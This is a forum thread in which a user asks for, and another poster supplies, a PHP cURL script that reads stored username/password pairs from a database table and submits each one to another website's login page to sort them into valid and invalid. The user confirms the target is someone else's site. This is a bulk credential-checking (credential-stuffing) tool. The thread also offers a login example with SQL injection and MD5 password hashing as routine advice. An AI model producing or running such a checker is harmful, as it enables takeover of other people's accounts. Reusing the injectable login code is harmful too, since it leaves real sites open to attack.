I currently have this code, its an account checker for a website, it checks if the information is valid or not.

PHP Code:

<?php
$username = "username";
$password = "password";

   $ch = curl_init();
   curl_setopt($ch, CURLOPT_URL, "https://website.com/login.ws"); 
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
   curl_setopt($ch, CURLOPT_POST, 1);
   curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".$username."&password=".$password."&dest=title.ws&mod=www&ssl=0");
   $pagedata = curl_exec($ch);
   curl_close($ch);
   
   
   
if (preg_match("/Your login was successful. You will shortly be redirected to your destination./i", $pagedata)) {

$valid = "Valid";
   
   } elseif (preg_match("/Login Failed - Invalid Username or Password/i", $pagedata)) {
    $valid = "Invalid";

} else {
$valid = "Cannot check! Too many invalid logins";
}
echo $valid;  

?>

Can someone help me out by turning this into a database run account checker, that means instead of having to do it 1 by 1 by editing:

Code:

$username = "username";
$password = "password";

and reloading the pasge

It can just go to a database select a table, and the 2 columns named:

user
pass

and just go through the rows and check it.

Structure of my table:

Code:

+---------+------------+-----------+
| user_id |  username  |  password |
+---------+------------+-----------+
|       1 | john12     | thepass   |
|       2 | catman17   | cat       |
+---------+------------+-----------+

Is that possible?

Hi Sith, it is indeed possible, you can use sessions. Below is the basic information you need, called the below page login.php and point your form at it.

PHP Code:

<?php
session_start();

require_once('database.php'); // database connection information

$username = $_POST['username'];

$sql = "SELECT user_id, username FROM user WHERE username = '".$username."' AND password = '".md5($_POST['password'])."' LIMIT 1";
    $result = mysql_query($sql)or die(mysql_error());
    $valid = mysql_num_rows($result);
    if($valid > 0){
        $row = mysql_fetch_assoc($result);
        $_SESSION['user_id'] = $row['user_id'];
        $_SESSION['username'] = $row['username'];
        header("Location:loggedin.php");
    }else{
         header("Location:failed.php");
    }

Remember to include session_start(); at the very top of each of your pages, then create a page called checklogin.php and include the following code.

PHP Code:

if($_SESSION['user_id']<1){
    $page = 'loggedout';
}
if($page=='loggedout'){
    session_destroy();
    header('Location:login.php');
} 


So your general page structure will look as follows:

PHP Code:

<?php 
session_start();
require_once('database.php');
require_once('checklogin.php');
?>
<html>
<head>

</head>

<body>
</body>
</html>

Ensure all of your passwords are inserted into your database as MD5, google it if you aren't aware of what that is.

That should work ok although I wrote it in this box without syntax so there may be errors.

Cheers,
Andy

This is at all NOT what I need, I already know how to make a login.

I need a script that will directly get information from a table and post it.

Basicly turning this:

PHP Code:

$username = "username";
$password = "password"; 


so it is run by a database.

Because this is a not a login, it checks if the information is correct,
THERE IS NO LOGIN BEFORE IT.

http://www.google.com/search?q=php+login+code+example

Actually, that is exactly what this script does. It checks the database for existence of an entered user name and password ? Perhaps you should explain yourself a little better in your posts so as not to waste peoples valuable time.

I think what you are asking is to take a table of users and then loop through each user and post that info to the verification script....

If so...

Assuming the structure of your table name 'users'

+---------+------------+-----------+
| user_id | username | password |
+---------+------------+-----------+
| 1 | john12 | thepass |
| 2 | catman17 | cat |
+---------+------------+-----------+

Code:

include_once('database.php');

$sql = "select * from users";

$results = mysql_query($sql);

$ch = curl_init();

 while($user = mysql_fetch_array($results))
{
   $username = $user[0];
$password = $user[1];

   
   curl_setopt($ch, CURLOPT_URL, "https://website.com/login.ws"); 
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
   curl_setopt($ch, CURLOPT_POST, 1);
   curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".$username."&password=".$password."&dest=title.ws&mod=www&ssl=0");
   $pagedata = curl_exec($ch);
  
   
   
   
if (preg_match("/Your login was successful. You will shortly be redirected to your destination./i", $pagedata)) {

$valid = "Valid";
   
   } elseif (preg_match("/Login Failed - Invalid Username or Password/i", $pagedata)) {
    $valid = "Invalid";

} else {
$valid = "Cannot check! Too many invalid logins";
}
echo $valid;  

}

curl_close($ch);

I believe that is what you are going for.... doesn't make much sense to me...why do a cURL call if you accessing the db directly.

If this still isn't what you are looking for... good luck

Quote:

Originally Posted by spyderwebtech

I think what you are asking is to take a table of users and then loop through each user and post that info to the verification script....

If so...

Assuming the structure of your table name 'users'

+---------+------------+-----------+
| user_id | username | password |
+---------+------------+-----------+
| 1 | john12 | thepass |
| 2 | catman17 | cat |
+---------+------------+-----------+

Code:

include_once('database.php');

$sql = "select * from users";

$results = mysql_query($sql);

$ch = curl_init();

 while($user = mysql_fetch_array($results))
{
   $username = $user[0];
$password = $user[1];

   
   curl_setopt($ch, CURLOPT_URL, "https://website.com/login.ws"); 
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
   curl_setopt($ch, CURLOPT_POST, 1);
   curl_setopt($ch, CURLOPT_POSTFIELDS, "username=".$username."&password=".$password."&dest=title.ws&mod=www&ssl=0");
   $pagedata = curl_exec($ch);
  
   
   
   
if (preg_match("/Your login was successful. You will shortly be redirected to your destination./i", $pagedata)) {

$valid = "Valid";
   
   } elseif (preg_match("/Login Failed - Invalid Username or Password/i", $pagedata)) {
    $valid = "Invalid";

} else {
$valid = "Cannot check! Too many invalid logins";
}
echo $valid;  

}

curl_close($ch);

I believe that is what you are going for.... doesn't make much sense to me...why do a cURL call if you accessing the db directly.

If this still isn't what you are looking for... good luck

EXACTLY! I am not accesing my site tho, I am accessing another site.

Also, what does this mean:

PHP Code:

$username = $user[0];
$password = $user[1]; 


And shouldent it be like password[1]?

Code:

$username = $user[1];  /// this is the first column in the database for each record
$password = $user[2]; /// this is the second column in the database for each record

if you had a third column it would be $user[2] and so on and so on

It is not $password[1] because I am setting the result database object in this call

Code:

$user = mysql_fetch_array($results)

so every record is based upon the $user variable

The thing is the password column is 3rd as you can see in the structure.

It doesn't matter WHERE it is in the structure. It is WHERE it is in the query the would determine the index position in the array.

Oh okay. Thanks.

ya your right... it would be $user[1] and $user[2] receptively for username and password

No excuse.

Its alright. Thanks